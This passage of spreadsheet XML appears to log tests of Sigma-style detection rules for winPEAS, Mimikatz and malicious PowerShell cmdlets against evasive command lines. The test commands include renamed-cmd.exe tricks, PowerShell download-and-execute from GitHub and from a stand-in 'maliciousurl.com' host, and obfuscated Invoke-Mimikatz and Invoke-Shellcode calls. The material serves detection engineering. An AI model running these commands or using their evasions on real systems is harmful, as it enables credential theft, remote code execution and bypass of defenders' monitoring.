      <c r="H1015" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1015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015" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1015" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1016" ht="15.75" customHeight="1" s="42">
      <c r="A1016" s="43" t="n"/>
      <c r="B1016" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1016" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1016" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1016" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\cmd.exe %TEMP%\not_a_peas.exe &amp;&amp; %TEMP%\not_a_peas.exe /"c"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016" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1016" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1016" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1016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016" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1016" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1017" ht="15.75" customHeight="1" s="42">
      <c r="A1017" s="43" t="n"/>
      <c r="B1017" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1017" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1017" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1017" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\cmd.exe %TEMP%\not_a_peas.exe &amp;&amp; %TEMP%\not_a_peas.exe -"c"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017" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1017" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1017" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1017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017" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1017" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1018" ht="15.75" customHeight="1" s="42">
      <c r="A1018" s="43" t="n"/>
      <c r="B1018" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C1018" s="36" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D1018" s="36" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E1018" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\cmd.exe %TEMP%\not_a_peas.exe &amp;&amp; %TEMP%\not_a_peas.exe /C "powershell -Command (New-Object System.Net.WebClient).DownloadFile('https://github.com/carlospolop/PEASS-ng/releases/download/20240515-39d7363c/winPEASany.exe', 'C:\Users\Public\wp.exe'); start-process 'C:\Users\Public\wp.exe' -ArgumentList 'systeminfo', 'userinfo', 'networkinfo'"</t>
        </is>
      </c>
      <c r="F1018" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1018" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1018" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1018" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Download and Execute Pattern (e6c54d94-498c-4562-a37c-b469d8e9a275); Suspicious PowerShell Download and Execute Pattern (e6c54d94-498c-4562-a37c-b469d8e9a275); PowerShell DownloadFile (8f70ac5f-1f6f-4f8e-b454-db19561216c5); PowerShell DownloadFile (8f70ac5f-1f6f-4f8e-b454-db19561216c5); Potential Defense Evasion Via Binary Rename (36480ae1-a1cb-4eaa-a0d6-29801d7e9142); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1018" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1018" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1019" ht="15.75" customHeight="1" s="42">
      <c r="A1019" s="43" t="n"/>
      <c r="B1019" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_nslookup_domain_discovery</t>
        </is>
      </c>
      <c r="C1019" s="36" t="inlineStr">
        <is>
          <t>Network Reconnaissance Activity</t>
        </is>
      </c>
      <c r="D1019" s="36" t="inlineStr">
        <is>
          <t>e6313acd-208c-44fc-a0ff-db85d572e90e</t>
        </is>
      </c>
      <c r="E1019" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c nslookup -type=MX example.com</t>
        </is>
      </c>
      <c r="F1019" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1019" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1019" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1019" s="36" t="n"/>
      <c r="J1019" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1019" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1020" ht="15.75" customHeight="1" s="42">
      <c r="A1020" s="43" t="n"/>
      <c r="B1020" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1020" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1020" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1020" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1020" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1020" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1020" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1020" s="43" t="n"/>
      <c r="J1020" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1020" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1021" ht="15.75" customHeight="1" s="42">
      <c r="A1021" s="43" t="n"/>
      <c r="B1021" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1021" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1021" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1021" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1021" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1021" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1021" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1021" s="36" t="n"/>
      <c r="J1021" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1021" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1022" ht="15.75" customHeight="1" s="42">
      <c r="A1022" s="43" t="n"/>
      <c r="B1022" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1022" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1022" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1022" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1022" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1022" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1022" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1022" s="43" t="n"/>
      <c r="J1022" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1022" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1023" ht="15.75" customHeight="1" s="42">
      <c r="A1023" s="43" t="n"/>
      <c r="B1023" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1023" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1023" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1023" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1023" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1023" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1023" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I102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023" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1023" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1024" ht="15.75" customHeight="1" s="42">
      <c r="A1024" s="43" t="n"/>
      <c r="B1024" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1024" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1024" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1024" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1024" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1024" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1024" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I102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024" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1024" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1025" ht="15.75" customHeight="1" s="42">
      <c r="A1025" s="43" t="n"/>
      <c r="B1025" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1025" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1025" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1025" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1025" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1025" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1025" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I102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025" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1025" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1026" ht="15.75" customHeight="1" s="42">
      <c r="A1026" s="43" t="n"/>
      <c r="B1026" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1026" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1026" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1026" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1026" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1026" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1026" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I102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026" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1026" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1027" ht="15.75" customHeight="1" s="42">
      <c r="A1027" s="43" t="n"/>
      <c r="B1027" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1027" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1027" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1027" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1027" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1027" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1027" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I102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027" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1027" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1028" ht="15.75" customHeight="1" s="42">
      <c r="A1028" s="43" t="n"/>
      <c r="B1028" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1028" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1028" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1028" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1028" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1028" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1028" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I10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028" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1028" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1029" ht="15.75" customHeight="1" s="42">
      <c r="A1029" s="43" t="n"/>
      <c r="B1029" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1029" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1029" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1029" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1029" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1029" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1029" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I102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029" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1029" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1030" ht="15.75" customHeight="1" s="42">
      <c r="A1030" s="43" t="n"/>
      <c r="B1030" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1030" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1030" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1030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1030" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1030" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1030" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1030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030" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1030" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1031" ht="15.75" customHeight="1" s="42">
      <c r="A1031" s="43" t="n"/>
      <c r="B1031" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1031" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1031" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1031" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1031" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1031" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1031" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I103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031" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1031" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1032" ht="15.75" customHeight="1" s="42">
      <c r="A1032" s="43" t="n"/>
      <c r="B1032" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1032" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1032" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1032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1032" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1032" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1032" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1032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032" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1032" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1033" ht="15.75" customHeight="1" s="42">
      <c r="A1033" s="43" t="n"/>
      <c r="B1033" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1033" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1033" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1033" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1033" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1033" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1033" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1033" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1033" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1033" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1034" ht="15.75" customHeight="1" s="42">
      <c r="A1034" s="43" t="n"/>
      <c r="B1034" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1034" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1034" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1034" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1034" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1034" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1034" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1034" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1034" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1034" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1035" ht="15.75" customHeight="1" s="42">
      <c r="A1035" s="43" t="n"/>
      <c r="B1035" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1035" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1035" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1035" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1035" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1035" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1035" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1035" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1035" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1035" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1036" ht="15.75" customHeight="1" s="42">
      <c r="A1036" s="43" t="n"/>
      <c r="B1036" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1036" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1036" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1036" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1036" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1036" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1036" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1036" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1036" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1036" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1037" ht="15.75" customHeight="1" s="42">
      <c r="A1037" s="43" t="n"/>
      <c r="B1037" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1037" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1037" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1037" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1037" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1037" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1037" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1037" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1037" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1037" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1038" ht="15.75" customHeight="1" s="42">
      <c r="A1038" s="43" t="n"/>
      <c r="B1038" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1038" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1038" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1038" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1038" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1038" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1038" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1038" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1038" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1038" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1039" ht="15.75" customHeight="1" s="42">
      <c r="A1039" s="43" t="n"/>
      <c r="B1039" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1039" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1039" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1039" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1039" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1039" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1039" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1039" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1039" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1039" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1040" ht="15.75" customHeight="1" s="42">
      <c r="A1040" s="43" t="n"/>
      <c r="B1040" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1040" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1040" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1040" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1040" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1040" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1040" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1040" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1040" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1040" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1041" ht="15.75" customHeight="1" s="42">
      <c r="A1041" s="43" t="n"/>
      <c r="B1041" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1041" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1041" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1041" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1041" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1041" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1041" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1041" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1041" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1041" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1042" ht="15.75" customHeight="1" s="42">
      <c r="A1042" s="43" t="n"/>
      <c r="B1042" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1042" s="36" t="inlineStr">
        <is>
